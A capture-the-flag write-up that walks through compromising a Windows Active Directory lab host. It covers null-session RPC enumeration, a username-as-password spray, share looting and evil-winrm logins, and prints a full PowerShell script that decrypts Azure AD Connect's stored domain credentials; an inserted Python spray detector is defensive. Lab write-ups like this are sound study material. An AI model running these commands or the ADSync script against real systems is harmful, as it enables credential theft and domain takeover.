Ok, starting off this writeup I begin with an nmap scan of the target IP using nmap -sC -sV (ip ADDR) to see what comes back in the results.
After getting the results back we can see that we have RPC bind access as well as port 445, which is usually associated with SMB and Active Directory. With this in mind I try an RPC bind connection, which by default works on most Windows machines with no password. Once an attacker binds to an RPC interface, they can use it to extract information depending on their permissions and the capabilities of that interface. Here are common ways Bind RPC is used for enumeration:

1. Active Directory enumeration: MS-RPC interfaces like LSARPC, SAMR, DRSR, etc. can be bound to and queried. Tools like rpcclient or Impacket's lookupsid.py, lsaquery.py, and samrdump.py bind to these interfaces to:
- Enumerate user accounts.
- Enumerate domain trusts.
- Query SID (Security Identifier) to username mappings.
- Pull policy information.

With this in mind I get an RPC bind connection with the command rpcclient -U '' -N (ip). Here the -U (username) is left blank, so it is just the empty quotes '', and the -N flag stands for "no password".
Once the RPC connection is bound you can type the help command to see the various options you have. I went ahead and ran querydispinfo, where "querydispinfo" refers to querying for information about the available RPC interfaces and procedures on a server (this information includes details like the UUID and version of the RPC server, as well as the names and parameters of the exposed procedures), and enumdomusers, which enumerates the domain's users.
Now all you do is copy all the usernames found into a notepad file and save it.
Once that is saved, run netexec, since we know port 445 with SMB is open, and use the username list as the password list as well to see if any accounts still have default credentials where the password matches the username. The command is netexec smb (ip) -u (your file) -p (your file) --continue-on-success
After running that command we get a username and password match for SABatchJobs.
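From the defender's side, the username-as-password spray above leaves a recognisable trail: one source address failing against many distinct accounts in a short window, then a single success. The following Python detector is an added example, not part of this writeup; the flat event format, the 5-minute window, the five-account threshold and every account name except mhope and SABatchJobs are assumptions, and the sample lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in the shape of Windows Security events 4625 (logon failure)
# and 4624 (logon success); account names other than mhope and SABatchJobs are made up.
SAMPLE_LOG = """\
2024-01-01T10:00:01 EventID=4625 TargetUser=jdoe LogonType=3 IpAddress=10.10.14.5
2024-01-01T10:00:01 EventID=4625 TargetUser=asmith LogonType=3 IpAddress=10.10.14.5
2024-01-01T10:00:02 EventID=4625 TargetUser=mhope LogonType=3 IpAddress=10.10.14.5
2024-01-01T10:00:02 EventID=4625 TargetUser=tlee LogonType=3 IpAddress=10.10.14.5
2024-01-01T10:00:03 EventID=4625 TargetUser=svc_backup LogonType=3 IpAddress=10.10.14.5
2024-01-01T10:00:04 EventID=4624 TargetUser=SABatchJobs LogonType=3 IpAddress=10.10.14.5
2024-01-01T10:30:00 EventID=4625 TargetUser=mhope LogonType=3 IpAddress=10.10.20.7
2024-01-01T10:31:00 EventID=4624 TargetUser=mhope LogonType=3 IpAddress=10.10.20.7
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) EventID=(?P<event>\d+) TargetUser=(?P<user>\S+) "
                     r"LogonType=\d+ IpAddress=(?P<ip>\S+)$")

def parse(log_text):
    """Parse the flat format above into dicts sorted by time; non-matching lines are skipped."""
    events = []
    for m in (LINE_RE.match(line.strip()) for line in log_text.splitlines()):
        if m:
            events.append({"ts": datetime.fromisoformat(m["ts"]), "event": m["event"],
                           "user": m["user"].lower(), "ip": m["ip"]})
    return sorted(events, key=lambda e: e["ts"])

def detect_spray(events, window=timedelta(minutes=5), min_users=5):
    """Flag every source IP whose failed logons hit >= min_users distinct accounts
    inside one window, and list which accounts then logged on successfully from it."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)
    alerts = {}
    for ip, evs in by_ip.items():
        failures = [e for e in evs if e["event"] == "4625"]
        for i, start in enumerate(failures):
            cutoff = start["ts"] + window
            users = {e["user"] for e in failures[i:] if e["ts"] <= cutoff}
            if len(users) >= min_users:
                ok = {e["user"] for e in evs
                      if e["event"] == "4624" and start["ts"] <= e["ts"] <= cutoff}
                alerts[ip] = {"sprayed": sorted(users), "succeeded": sorted(ok)}
                break  # one alert per source is enough
    return alerts
```

A single failed-then-successful logon from the second address is normal user behaviour and is not flagged, which is what keeps the threshold from alerting on every mistyped password.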
Afterwards I decided to run smbmap to see which file shares were accessible to the user, and sure enough there were a couple with read-only permissions worth digging into. The command is smbmap -H (your ip) -u SABatchJobs -p SABatchJobs
After looking around, the users$ share contains an azure.xml file that is worth downloading.
To download it, the command is smbclient -U SABatchJobs //(your ip)/users$ SABatchJobs -c 'get mhope/azure.xml azure.xml'
I would recommend opening it in VIM (even though there is no escape xD) and we can see there is a password of 4n0therD4y@n0th3r$ that we can then use to log in with Evil-WinRM.
Then you log in with Evil-WinRM using the command evil-winrm -i (ip) -u mhope -p '4n0therD4y@n0th3r$' and bam, you should get a connection.
If you go to the Desktop you should see the user flag in user.txt.
For enumeration afterwards I head over to the C drive and look at what is in Program Files. I see Microsoft Azure AD Sync and AD Connect are installed, so I decide to confirm where it is.
To confirm, I ran the command C:\Program Files> Get-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\ADSync, which showed me the path and binary the service runs from, so it is confirmed to be on the system.
Next, for the enumeration to root, I was looking online for ADSync and found a blog at https://blog.xpnsec.com/azuread-connect-for-redteam/; when scrolling down you will see the explanation as well as a PowerShell script that works for the ADSync attack. I will paste the script below; you can copy and paste it, save it as a .ps1, upload it and run it.
# Connect to the local ADSync database with the current user's Windows credentials
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=127.0.0.1;Database=ADSync;Integrated Security=True"
$client.Open()

# Read the key set identifiers used by the ADSync key manager
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()

# Read the AD management agent configuration and its encrypted credential blob
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()

# Load the ADSync crypto library, load the key set and decrypt the blob
add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)

# Pull the domain, username and password out of the XML
$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerXML}}
Write-Host ("Domain: " + $domain.Domain)
Write-Host ("Username: " + $username.Username)
Write-Host ("Password: " + $password.Password)
After running the script we get a password of 'd0m@in4dminyeah!', so now we can try to log in as Administrator with Evil-WinRM using the command evil-winrm -i yourip -u administrator -p 'd0m@in4dminyeah!'
If you head to the Administrator's Desktop folder you should find the root flag.